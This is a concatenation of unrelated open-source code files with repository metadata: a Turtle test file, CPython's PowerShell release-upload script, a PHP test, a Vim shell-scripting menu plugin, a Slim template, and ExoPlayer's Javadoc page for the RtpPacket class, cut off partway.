:c9498, :c9499, :c9500, :c9501, :c9502, :c9503, :c9504, :c9505, :c9506, :c9507, :c9508, :c9509, :c9510, :c9511, :c9512, :c9513, :c9514, :c9515, :c9516, :c9517, :c9518, :c9519, :c9520, :c9521, :c9522, :c9523, :c9524, :c9525, :c9526, :c9527, :c9528, :c9529, :c9530, :c9531, :c9532, :c9533, :c9534, :c9535, :c9536, :c9537, :c9538, :c9539, :c9540, :c9541, :c9542, :c9543, :c9544, :c9545, :c9546, :c9547, :c9548, :c9549, :c9550, :c9551, :c9552, :c9553, :c9554, :c9555, :c9556, :c9557, :c9558, :c9559, :c9560, :c9561, :c9562, :c9563, :c9564, :c9565, :c9566, :c9567, :c9568, :c9569, :c9570, :c9571, :c9572, :c9573, :c9574, :c9575, :c9576, :c9577, :c9578, :c9579, :c9580, :c9581, :c9582, :c9583, :c9584, :c9585, :c9586, :c9587, :c9588, :c9589, :c9590, :c9591, :c9592, :c9593, :c9594, :c9595, :c9596, :c9597, :c9598, :c9599, :c9600, :c9601, :c9602, :c9603, :c9604, :c9605, :c9606, :c9607, :c9608, :c9609, :c9610, :c9611, :c9612, :c9613, :c9614, :c9615, :c9616, :c9617, :c9618, :c9619, :c9620, :c9621, :c9622, :c9623, :c9624, :c9625, :c9626, :c9627, :c9628, :c9629, :c9630, :c9631, :c9632, :c9633, :c9634, :c9635, :c9636, :c9637, :c9638, :c9639, :c9640, :c9641, :c9642, :c9643, :c9644, :c9645, :c9646, :c9647, :c9648, :c9649, :c9650, :c9651, :c9652, :c9653, :c9654, :c9655, :c9656, :c9657, :c9658, :c9659, :c9660, :c9661, :c9662, :c9663, :c9664, :c9665, :c9666, :c9667, :c9668, :c9669, :c9670, :c9671, :c9672, :c9673, :c9674, :c9675, :c9676, :c9677, :c9678, :c9679, :c9680, :c9681, :c9682, :c9683, :c9684, :c9685, :c9686, :c9687, :c9688, :c9689, :c9690, :c9691, :c9692, :c9693, :c9694, :c9695, :c9696, :c9697, :c9698, :c9699, :c9700, :c9701, :c9702, :c9703, :c9704, :c9705, :c9706, :c9707, :c9708, :c9709, :c9710, :c9711, :c9712, :c9713, :c9714, :c9715, :c9716, :c9717, :c9718, :c9719, :c9720, :c9721, :c9722, :c9723, :c9724, :c9725, :c9726, :c9727, :c9728, :c9729, :c9730, :c9731, :c9732, :c9733, :c9734, :c9735, :c9736, :c9737, :c9738, :c9739, :c9740, :c9741, :c9742, :c9743, :c9744, :c9745, :c9746, :c9747, :c9748, :c9749, :c9750, :c9751, :c9752, :c9753, :c9754, :c9755, :c9756, :c9757, :c9758, :c9759, :c9760, :c9761, :c9762, :c9763, :c9764, :c9765, :c9766, :c9767, :c9768, :c9769, :c9770, :c9771, :c9772, :c9773, :c9774, :c9775, :c9776, :c9777, :c9778, :c9779, :c9780, :c9781, :c9782, :c9783, :c9784, :c9785, :c9786, :c9787, :c9788, :c9789, :c9790, :c9791, :c9792, :c9793, :c9794, :c9795, :c9796, :c9797, :c9798, :c9799, :c9800, :c9801, :c9802, :c9803, :c9804, :c9805, :c9806, :c9807, :c9808, :c9809, :c9810, :c9811, :c9812, :c9813, :c9814, :c9815, :c9816, :c9817, :c9818, :c9819, :c9820, :c9821, :c9822, :c9823, :c9824, :c9825, :c9826, :c9827, :c9828, :c9829, :c9830, :c9831, :c9832, :c9833, :c9834, :c9835, :c9836, :c9837, :c9838, :c9839, :c9840, :c9841, :c9842, :c9843, :c9844, :c9845, :c9846, :c9847, :c9848, :c9849, :c9850, :c9851, :c9852, :c9853, :c9854, :c9855, :c9856, :c9857, :c9858, :c9859, :c9860, :c9861, :c9862, :c9863, :c9864, :c9865, :c9866, :c9867, :c9868, :c9869, :c9870, :c9871, :c9872, :c9873, :c9874, :c9875, :c9876, :c9877, :c9878, :c9879, :c9880, :c9881, :c9882, :c9883, :c9884, :c9885, :c9886, :c9887, :c9888, :c9889, :c9890, :c9891, :c9892, :c9893, :c9894, :c9895, :c9896, :c9897, :c9898, :c9899, :c9900, :c9901, :c9902, :c9903, :c9904, :c9905, :c9906, :c9907, :c9908, :c9909, :c9910, :c9911, :c9912, :c9913, :c9914, :c9915, :c9916, :c9917, :c9918, :c9919, :c9920, :c9921, :c9922, :c9923, :c9924, :c9925, :c9926, :c9927, :c9928, :c9929, :c9930, :c9931, :c9932, :c9933, :c9934, :c9935, :c9936, :c9937, :c9938, :c9939, :c9940, :c9941, :c9942, :c9943, :c9944, :c9945, :c9946, :c9947, :c9948, :c9949, :c9950, :c9951, :c9952, :c9953, :c9954, :c9955, :c9956, :c9957, :c9958, :c9959, :c9960, :c9961, :c9962, :c9963, :c9964, :c9965, :c9966, :c9967, :c9968, :c9969, :c9970, :c9971, :c9972, :c9973, :c9974, :c9975, :c9976, :c9977, :c9978, :c9979, :c9980, :c9981, :c9982, :c9983, :c9984, :c9985, :c9986, :c9987, :c9988, :c9989, :c9990, :c9991, :c9992, :c9993, :c9994, :c9995, :c9996, :c9997, :c9998, :c9999, :c10000 .
Turtle
0
joshrose/audacity
lib-src/lv2/sord/tests/test-15.ttl
[ "CC-BY-3.0" ]
<# .Synopsis Uploads from a VSTS release build layout to python.org .Description Given the downloaded/extracted build artifact from a release build run on python.visualstudio.com, this script uploads the files to the correct locations. .Parameter build The location on disk of the extracted build artifact. .Parameter user The username to use when logging into the host. .Parameter server The host or PuTTY session name. .Parameter target The subdirectory on the host to copy files to. .Parameter tests The path to run download tests in. .Parameter doc_htmlhelp Optional path besides -build to locate CHM files. .Parameter embed Optional path besides -build to locate ZIP files. .Parameter skipupload Skip uploading .Parameter skippurge Skip purging the CDN .Parameter skiptest Skip the download tests .Parameter skiphash Skip displaying hashes #> param( [Parameter(Mandatory=$true)][string]$build, [Parameter(Mandatory=$true)][string]$user, [string]$server="python-downloads", [string]$target="/srv/www.python.org/ftp/python", [string]$tests=${env:TEMP}, [string]$doc_htmlhelp=$null, [string]$embed=$null, [switch]$skipupload, [switch]$skippurge, [switch]$skiptest, [switch]$skiphash ) if (-not $build) { throw "-build option is required" } if (-not $user) { throw "-user option is required" } $tools = $script:MyInvocation.MyCommand.Path | Split-Path -parent; if (-not ((Test-Path "$build\win32\python-*.exe") -or (Test-Path "$build\amd64\python-*.exe"))) { throw "-build argument does not look like a 'build' directory" } function find-putty-tool { param ([string]$n) $t = gcm $n -EA 0 if (-not $t) { $t = gcm ".\$n" -EA 0 } if (-not $t) { $t = gcm "${env:ProgramFiles}\PuTTY\$n" -EA 0 } if (-not $t) { $t = gcm "${env:ProgramFiles(x86)}\PuTTY\$n" -EA 0 } if (-not $t) { throw "Unable to locate $n.exe. Please put it on $PATH" } return gi $t.Path } $p = gci -r "$build\python-*.exe" | ` ?{ $_.Name -match '^python-(\d+\.\d+\.\d+)((a|b|rc)\d+)?-.+' } | ` select -first 1 | ` %{ $Matches[1], $Matches[2] } "Uploading version $($p[0]) $($p[1])" " from: $build" " to: $($server):$target/$($p[0])" "" if (-not $skipupload) { # Upload files to the server $pscp = find-putty-tool "pscp" $plink = find-putty-tool "plink" "Upload using $pscp and $plink" "" if ($doc_htmlhelp) { pushd $doc_htmlhelp } else { pushd $build } $chm = gci python*.chm, python*.chm.asc popd $d = "$target/$($p[0])/" & $plink -batch $user@$server mkdir $d & $plink -batch $user@$server chgrp downloads $d & $plink -batch $user@$server chmod o+rx $d & $pscp -batch $chm.FullName "$user@${server}:$d" if (-not $?) { throw "Failed to upload $chm" } $dirs = gci "$build" -Directory if ($embed) { $dirs = ($dirs, (gi $embed)) | %{ $_ } } foreach ($a in $dirs) { "Uploading files from $($a.FullName)" pushd "$($a.FullName)" $exe = gci *.exe, *.exe.asc, *.zip, *.zip.asc $msi = gci *.msi, *.msi.asc, *.msu, *.msu.asc popd if ($exe) { & $pscp -batch $exe.FullName "$user@${server}:$d" if (-not $?) { throw "Failed to upload $exe" } } if ($msi) { $sd = "$d$($a.Name)$($p[1])/" & $plink -batch $user@$server mkdir $sd & $plink -batch $user@$server chgrp downloads $sd & $plink -batch $user@$server chmod o+rx $sd & $pscp -batch $msi.FullName "$user@${server}:$sd" if (-not $?) { throw "Failed to upload $msi" } & $plink -batch $user@$server chgrp downloads $sd* & $plink -batch $user@$server chmod g-x,o+r $sd* } } & $plink -batch $user@$server chgrp downloads $d* & $plink -batch $user@$server chmod g-x,o+r $d* & $pscp -ls "$user@${server}:$d" } if (-not $skippurge) { # Run a CDN purge py $tools\purge.py "$($p[0])$($p[1])" } if (-not $skiptest) { # Use each web installer to produce a layout. This will download # each referenced file and validate their signatures/hashes. gci "$build\*-webinstall.exe" -r -File | %{ $d = mkdir "$tests\$($_.BaseName)" -Force gci $d -r -File | del $ic = copy $_ $d -PassThru "Checking layout for $($ic.Name)" Start-Process -wait $ic "/passive", "/layout", "$d\layout", "/log", "$d\log\install.log" if (-not $?) { Write-Error "Failed to validate layout of $($inst.Name)" } } } if (-not $skiphash) { # Display MD5 hash and size of each downloadable file pushd $build $files = gci python*.chm, *\*.exe, *\*.zip if ($doc_htmlhelp) { cd $doc_htmlhelp $files = ($files, (gci python*.chm)) | %{ $_ } } if ($embed) { cd $embed $files = ($files, (gci *.zip)) | %{ $_ } } popd $hashes = $files | ` Sort-Object Name | ` Format-Table Name, @{Label="MD5"; Expression={(Get-FileHash $_ -Algorithm MD5).Hash}}, Length -AutoSize | ` Out-String -Width 4096 $hashes | clip $hashes }
PowerShell
4
pxeger/cpython
Tools/msi/uploadrelease.ps1
[ "0BSD" ]
--TEST-- Constructor promotion cannot be used in a free function --FILE-- <?php function __construct(public $prop) {} ?> --EXPECTF-- Fatal error: Cannot declare promoted property outside a constructor in %s on line %d
PHP
2
NathanFreeman/php-src
Zend/tests/ctor_promotion_free_function.phpt
[ "PHP-3.01" ]
" When you're writing shell scripts and you are in doubt which test to use, " which shell environment variables are defined, what the syntax of the case " statement is, and you need to invoke 'man sh'? " " Your problems are over now! " " Attached is a Vim script file for turning gvim into a shell script editor. " It may also be used as an example how to use menus in Vim. " " Written by: Lennart Schultz <[email protected]> imenu Stmts.for for in do doneki kk0elli imenu Stmts.case case in ) ;; esacbki k0elli imenu Stmts.if if then fiki kk0elli imenu Stmts.if-else if then else fiki kki kk0elli imenu Stmts.elif elif then ki kk0elli imenu Stmts.while while do doneki kk0elli imenu Stmts.break break imenu Stmts.continue continue imenu Stmts.function () { }ki k0i imenu Stmts.return return imenu Stmts.return-true return 0 imenu Stmts.return-false return 1 imenu Stmts.exit exit imenu Stmts.shift shift imenu Stmts.trap trap imenu Test.existence [ -e ]hi imenu Test.existence - file [ -f ]hi imenu Test.existence - file (not empty) [ -s ]hi imenu Test.existence - directory [ -d ]hi imenu Test.existence - executable [ -x ]hi imenu Test.existence - readable [ -r ]hi imenu Test.existence - writable [ -w ]hi imenu Test.String is empty [ x = "x$" ]hhi imenu Test.String is not empty [ x != "x$" ]hhi imenu Test.Strings is equal [ "" = "" ]hhhhhhhi imenu Test.Strings is not equal [ "" != "" ]hhhhhhhhi imenu Test.Values is greater than [ -gt ]hhhhhhi imenu Test.Values is greater equal [ -ge ]hhhhhhi imenu Test.Values is equal [ -eq ]hhhhhhi imenu Test.Values is not equal [ -ne ]hhhhhhi imenu Test.Values is less than [ -lt ]hhhhhhi imenu Test.Values is less equal [ -le ]hhhhhhi imenu ParmSub.Substitute word if parm not set ${:-}hhi imenu ParmSub.Set parm to word if not set ${:=}hhi imenu ParmSub.Substitute word if parm set else nothing ${:+}hhi imenu ParmSub.If parm not set print word and exit ${:?}hhi imenu SpShVars.Number of positional parameters ${#} imenu SpShVars.All positional parameters (quoted spaces) ${*} imenu SpShVars.All positional parameters (unquoted spaces) ${@} imenu SpShVars.Flags set ${-} imenu SpShVars.Return code of last command ${?} imenu SpShVars.Process number of this shell ${$} imenu SpShVars.Process number of last background command ${!} imenu Environ.HOME ${HOME} imenu Environ.PATH ${PATH} imenu Environ.CDPATH ${CDPATH} imenu Environ.MAIL ${MAIL} imenu Environ.MAILCHECK ${MAILCHECK} imenu Environ.PS1 ${PS1} imenu Environ.PS2 ${PS2} imenu Environ.IFS ${IFS} imenu Environ.SHACCT ${SHACCT} imenu Environ.SHELL ${SHELL} imenu Environ.LC_CTYPE ${LC_CTYPE} imenu Environ.LC_MESSAGES ${LC_MESSAGES} imenu Builtins.cd cd imenu Builtins.echo echo imenu Builtins.eval eval imenu Builtins.exec exec imenu Builtins.export export imenu Builtins.getopts getopts imenu Builtins.hash hash imenu Builtins.newgrp newgrp imenu Builtins.pwd pwd imenu Builtins.read read imenu Builtins.readonly readonly imenu Builtins.return return imenu Builtins.times times imenu Builtins.type type imenu Builtins.umask umask imenu Builtins.wait wait imenu Set.set set imenu Set.unset unset imenu Set.mark modified or modified variables set -a imenu Set.exit when command returns non-zero exit code set -e imenu Set.Disable file name generation set -f imenu Set.remember function commands set -h imenu Set.All keyword arguments are placed in the environment set -k imenu Set.Read commands but do not execute them set -n imenu Set.Exit after reading and executing one command set -t imenu Set.Treat unset variables as an error when substituting set -u imenu Set.Print shell input lines as they are read set -v imenu Set.Print commands and their arguments as they are executed set -x
VimL
3
uga-rosa/neovim
runtime/pack/dist/opt/shellmenu/plugin/shellmenu.vim
[ "Vim" ]
= yield_content :foo do | baz
Slim
1
osamtimizer/sinatra
sinatra-contrib/spec/content_for/yield_block.slim
[ "MIT" ]
<!DOCTYPE HTML> <!-- NewPage --> <html lang="en"> <head><!-- start favicons snippet, use https://realfavicongenerator.net/ --><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/favicon-16x16.png"><link rel="manifest" href="/assets/site.webmanifest"><link rel="mask-icon" href="/assets/safari-pinned-tab.svg" color="#fc4d50"><link rel="shortcut icon" href="/assets/favicon.ico"><meta name="msapplication-TileColor" content="#ffc40d"><meta name="msapplication-config" content="/assets/browserconfig.xml"><meta name="theme-color" content="#ffffff"><!-- end favicons snippet --> <title>RtpPacket (ExoPlayer library)</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style"> <link rel="stylesheet" type="text/css" href="../../../../../../jquery/jquery-ui.css" title="Style"> <script type="text/javascript" src="../../../../../../script.js"></script> <script type="text/javascript" src="../../../../../../jquery/jszip/dist/jszip.min.js"></script> <script type="text/javascript" src="../../../../../../jquery/jszip-utils/dist/jszip-utils.min.js"></script> <!--[if IE]> <script type="text/javascript" src="../../../../../../jquery/jszip-utils/dist/jszip-utils-ie.min.js"></script> <![endif]--> <script type="text/javascript" src="../../../../../../jquery/jquery-3.5.1.js"></script> <script type="text/javascript" src="../../../../../../jquery/jquery-ui.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="RtpPacket (ExoPlayer library)"; } } catch(err) { } //--> var data = {"i0":10,"i1":10,"i2":9,"i3":9,"i4":10,"i5":10}; var tabs = {65535:["t0","All Methods"],1:["t1","Static Methods"],2:["t2","Instance Methods"],8:["t4","Concrete Methods"]}; var altColor = "altColor"; var rowColor = "rowColor"; var tableTab = "tableTab"; var activeTableTab = "activeTableTab"; var pathtoroot = "../../../../../../"; var useModuleDirectories = false; loadScripts(document, 'script');</script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <header role="banner"> <nav role="navigation"> <div class="fixedNav"> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a id="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a id="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../index.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../../allclasses.html">All&nbsp;Classes</a></li> </ul> <ul class="navListSearch"> <li><label for="search">SEARCH:</label> <input type="text" id="search" value="search" disabled="disabled"> <input type="reset" id="reset" value="reset" disabled="disabled"> </li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li><a href="#nested.class.summary">Nested</a>&nbsp;|&nbsp;</li> <li><a href="#field.summary">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#field.detail">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a id="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> </div> <div class="navPadding">&nbsp;</div> <script type="text/javascript"><!-- $('.navPadding').css('padding-top', $('.fixedNav').css("height")); //--> </script> </nav> </header> <!-- ======== START OF CLASS DATA ======== --> <main role="main"> <div class="header"> <div class="subTitle"><span class="packageLabelInType">Package</span>&nbsp;<a href="package-summary.html">com.google.android.exoplayer2.source.rtsp</a></div> <h2 title="Class RtpPacket" class="title">Class RtpPacket</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li><a href="https://developer.android.com/reference/java/lang/Object.html" title="class or interface in java.lang" class="externalLink" target="_top">java.lang.Object</a></li> <li> <ul class="inheritance"> <li>com.google.android.exoplayer2.source.rtsp.RtpPacket</li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <hr> <pre>public final class <span class="typeNameLabel">RtpPacket</span> extends <a href="https://developer.android.com/reference/java/lang/Object.html" title="class or interface in java.lang" class="externalLink" target="_top">Object</a></pre> <div class="block">Represents the header and the payload of an RTP packet. <p>Not supported parsing at the moment: header extension and CSRC. <p>Structure of an RTP header (RFC3550, Section 5.1). <pre> 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |V=2|P|X| CC |M| PT | sequence number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | timestamp | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | synchronization source (SSRC) identifier | +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ | contributing source (CSRC) identifiers | | .... | +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ | Profile-specific extension ID | Extension header length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Extension header | | .... | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 3 2 1 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 </pre></div> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- ======== NESTED CLASS SUMMARY ======== --> <section role="region"> <ul class="blockList"> <li class="blockList"><a id="nested.class.summary"> <!-- --> </a> <h3>Nested Class Summary</h3> <table class="memberSummary"> <caption><span>Nested Classes</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colSecond" scope="col">Class</th> <th class="colLast" scope="col">Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>static class&nbsp;</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="RtpPacket.Builder.html" title="class in com.google.android.exoplayer2.source.rtsp">RtpPacket.Builder</a></span></code></th> <td class="colLast"> <div class="block">Builder class for an <a href="RtpPacket.html" title="class in com.google.android.exoplayer2.source.rtsp"><code>RtpPacket</code></a></div> </td> </tr> </table> </li> </ul> </section> <!-- =========== FIELD SUMMARY =========== --> <section role="region"> <ul class="blockList"> <li class="blockList"><a id="field.summary"> <!-- --> </a> <h3>Field Summary</h3> <table class="memberSummary"> <caption><span>Fields</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colSecond" scope="col">Field</th> <th class="colLast" scope="col">Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>byte[]</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#csrc">csrc</a></span></code></th> <td class="colLast"> <div class="block">The RTP CSRC fields (Optional, up to 15 items).</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#CSRC_SIZE">CSRC_SIZE</a></span></code></th> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>byte</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#csrcCount">csrcCount</a></span></code></th> <td class="colLast"> <div class="block">The RTP CSRC count field (Word 0, bits 4-7).</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>boolean</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#extension">extension</a></span></code></th> <td class="colLast"> <div class="block">The RTP extension bit (Word 0, bit 3).</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>boolean</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#marker">marker</a></span></code></th> <td class="colLast"> <div class="block">The RTP marker bit (Word 0, bit 8).</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#MAX_SEQUENCE_NUMBER">MAX_SEQUENCE_NUMBER</a></span></code></th> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#MAX_SIZE">MAX_SIZE</a></span></code></th> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static int</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#MIN_HEADER_SIZE">MIN_HEADER_SIZE</a></span></code></th> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#MIN_SEQUENCE_NUMBER">MIN_SEQUENCE_NUMBER</a></span></code></th> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>boolean</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#padding">padding</a></span></code></th> <td class="colLast"> <div class="block">The RTP padding bit (Word 0, bit 2).</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>byte[]</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#payloadData">payloadData</a></span></code></th> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>byte</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#payloadType">payloadType</a></span></code></th> <td class="colLast"> <div class="block">The RTP CSRC count field (Word 0, bits 9-15).</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#RTP_VERSION">RTP_VERSION</a></span></code></th> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>int</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#sequenceNumber">sequenceNumber</a></span></code></th> <td class="colLast"> <div class="block">The RTP sequence number field (Word 0, bits 16-31).</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>int</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#ssrc">ssrc</a></span></code></th> <td class="colLast"> <div class="block">The RTP SSRC field (Word 2).</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>long</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#timestamp">timestamp</a></span></code></th> <td class="colLast"> <div class="block">The RTP timestamp field (Word 1).</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>byte</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#version">version</a></span></code></th> <td class="colLast"> <div class="block">The RTP version field (Word 0, bits 0-1), should always be 2.</div> </td> </tr> </table> </li> </ul> </section> <!-- ========== METHOD SUMMARY =========== --> <section role="region"> <ul class="blockList"> <li class="blockList"><a id="method.summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="memberSummary"> <caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd">&nbsp;</span></span><span id="t1" class="tableTab"><span><a href="javascript:show(1);">Static Methods</a></span><span class="tabEnd">&nbsp;</span></span><span id="t2" class="tableTab"><span><a href="javascript:show(2);">Instance Methods</a></span><span class="tabEnd">&nbsp;</span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd">&nbsp;</span></span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colSecond" scope="col">Method</th> <th class="colLast" scope="col">Description</th> </tr> <tr id="i0" class="altColor"> <td class="colFirst"><code>boolean</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#equals(java.lang.Object)">equals</a></span>&#8203;(<a href="https://developer.android.com/reference/java/lang/Object.html" title="class or interface in java.lang" class="externalLink" target="_top">Object</a>&nbsp;o)</code></th> <td class="colLast">&nbsp;</td> </tr> <tr id="i1" class="rowColor"> <td class="colFirst"><code>int</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#hashCode()">hashCode</a></span>()</code></th> <td class="colLast">&nbsp;</td> </tr> <tr id="i2" class="altColor"> <td class="colFirst"><code>static <a href="RtpPacket.html" title="class in com.google.android.exoplayer2.source.rtsp">RtpPacket</a></code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#parse(byte%5B%5D,int)">parse</a></span>&#8203;(byte[]&nbsp;buffer, int&nbsp;length)</code></th> <td class="colLast"> <div class="block">Creates an <a href="RtpPacket.html" title="class in com.google.android.exoplayer2.source.rtsp"><code>RtpPacket</code></a> from a byte array.</div> </td> </tr> <tr id="i3" class="rowColor"> <td class="colFirst"><code>static <a href="RtpPacket.html" title="class in com.google.android.exoplayer2.source.rtsp">RtpPacket</a></code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#parse(com.google.android.exoplayer2.util.ParsableByteArray)">parse</a></span>&#8203;(<a href="../../util/ParsableByteArray.html" title="class in com.google.android.exoplayer2.util">ParsableByteArray</a>&nbsp;packetBuffer)</code></th> <td class="colLast"> <div class="block">Creates an <a href="RtpPacket.html" title="class in com.google.android.exoplayer2.source.rtsp"><code>RtpPacket</code></a> from a <a href="../../util/ParsableByteArray.html" title="class in com.google.android.exoplayer2.util"><code>ParsableByteArray</code></a>.</div> </td> </tr> <tr id="i4" class="altColor"> <td class="colFirst"><code><a href="https://developer.android.com/reference/java/lang/String.html" title="class or interface in java.lang" class="externalLink" target="_top">String</a></code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#toString()">toString</a></span>()</code></th> <td class="colLast">&nbsp;</td> </tr> <tr id="i5" class="rowColor"> <td class="colFirst"><code>int</code></td> <th class="colSecond" scope="row"><code><span class="memberNameLink"><a href="#writeToBuffer(byte%5B%5D,int,int)">writeToBuffer</a></span>&#8203;(byte[]&nbsp;target, int&nbsp;offset, int&nbsp;length)</code></th> <td class="colLast"> <div class="block">Writes the data in an RTP packet to a target buffer.</div> </td> </tr> </table> <ul class="blockList"> <li class="blockList"><a id="methods.inherited.from.class.java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.<a href="https://developer.android.com/reference/java/lang/Object.html" title="class or interface in java.lang" class="externalLink" target="_top">Object</a></h3> <code><a href="https://developer.android.com/reference/java/lang/Object.html#clone()" title="class or interface in java.lang" class="externalLink">clone</a>, <a href="https://developer.android.com/reference/java/lang/Object.html?is-external=true#finalize()" title="class or interface in java.lang" class="externalLink">finalize</a>, <a href="https://developer.android.com/reference/java/lang/Object.html?is-external=true#getClass()" title="class or interface in java.lang" class="externalLink">getClass</a>, <a href="https://developer.android.com/reference/java/lang/Object.html?is-external=true#notify()" title="class or interface in java.lang" class="externalLink">notify</a>, <a href="https://developer.android.com/reference/java/lang/Object.html?is-external=true#notifyAll()" title="class or interface in java.lang" class="externalLink">notifyAll</a>, <a href="https://developer.android.com/reference/java/lang/Object.html?is-external=true#wait()" title="class or interface in java.lang" class="externalLink">wait</a>, <a href="https://developer.android.com/reference/java/lang/Object.html?is-external=true#wait(long)" title="class or interface in java.lang" class="externalLink">wait</a>, <a href="https://developer.android.com/reference/java/lang/Object.html?is-external=true#wait(long,int)" title="class or interface in java.lang" class="externalLink" target="_top">wait</a></code></li> </ul> </li> </ul> </section> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ FIELD DETAIL =========== --> <section role="region"> <ul class="blockList"> <li 